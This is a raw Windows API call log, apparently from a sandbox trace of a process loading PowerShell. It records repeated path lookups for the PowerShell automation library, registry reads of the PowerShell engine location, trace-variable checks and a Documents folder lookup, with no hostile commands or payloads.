	[0615.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.228] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed798 | out: phkResult=0x1ed798*=0x380) returned 0x0
	[0615.228] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed71c, lpData=0x0, lpcbData=0x1ed718*=0x0 | out: lpType=0x1ed71c*=0x1, lpData=0x0, lpcbData=0x1ed718*=0x56) returned 0x0
	[0615.228] CoTaskMemAlloc (cb=0x5a) returned 0x38dfe0
	[0615.228] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed6ec, lpData=0x38dfe0, lpcbData=0x1ed6e8*=0x56 | out: lpType=0x1ed6ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed6e8*=0x56) returned 0x0
	[0615.229] CoTaskMemFree (pv=0x38dfe0) 
	[0615.229] RegCloseKey (hKey=0x380) returned 0x0
	[0615.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.237] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0615.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.237] CoTaskMemFree (pv=0x409f00) 
	[0615.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.030] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0616.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.031] CoTaskMemFree (pv=0x409f00) 
	[0616.041] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0616.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.041] CoTaskMemFree (pv=0x409f00) 
	[0616.041] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0616.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.042] CoTaskMemFree (pv=0x409f00) 
	[0616.042] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0616.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.042] CoTaskMemFree (pv=0x409f00) 
	[0616.043] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0616.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.043] CoTaskMemFree (pv=0x409f00) 
	[0616.048] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0616.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.048] CoTaskMemFree (pv=0x409f00) 
	[0616.049] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0616.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.049] CoTaskMemFree (pv=0x409f00) 
	[0617.306] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0617.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.306] CoTaskMemFree (pv=0x409f00) 
	[0618.847] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x40a340
	[0618.849] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x40a450
	[0624.798] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0624.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.799] CoTaskMemFree (pv=0x40a560) 
	[0624.802] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0624.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.802] CoTaskMemFree (pv=0x40a560) 
	[0625.492] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed8f8 | out: phkResult=0x1ed8f8*=0x38c) returned 0x0
	[0625.492] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed87c, lpData=0x0, lpcbData=0x1ed878*=0x0 | out: lpType=0x1ed87c*=0x1, lpData=0x0, lpcbData=0x1ed878*=0x56) returned 0x0
	[0625.492] CoTaskMemAlloc (cb=0x5a) returned 0x1b9db8f0
	[0625.492] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed84c, lpData=0x1b9db8f0, lpcbData=0x1ed848*=0x56 | out: lpType=0x1ed84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed848*=0x56) returned 0x0
	[0625.493] CoTaskMemFree (pv=0x1b9db8f0) 
	[0625.493] RegCloseKey (hKey=0x38c) returned 0x0
	[0625.493] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed8f8 | out: phkResult=0x1ed8f8*=0x38c) returned 0x0
	[0625.493] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed87c, lpData=0x0, lpcbData=0x1ed878*=0x0 | out: lpType=0x1ed87c*=0x1, lpData=0x0, lpcbData=0x1ed878*=0x56) returned 0x0
	[0625.493] CoTaskMemAlloc (cb=0x5a) returned 0x1b9db8f0
	[0625.493] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed84c, lpData=0x1b9db8f0, lpcbData=0x1ed848*=0x56 | out: lpType=0x1ed84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed848*=0x56) returned 0x0
	[0625.493] CoTaskMemFree (pv=0x1b9db8f0) 
	[0625.493] RegCloseKey (hKey=0x38c) returned 0x0
	[0625.494] CoTaskMemAlloc (cb=0x20c) returned 0x1b9ab970
	[0625.494] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b9ab970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0625.494] CoTaskMemFree (pv=0x1b9ab970) 
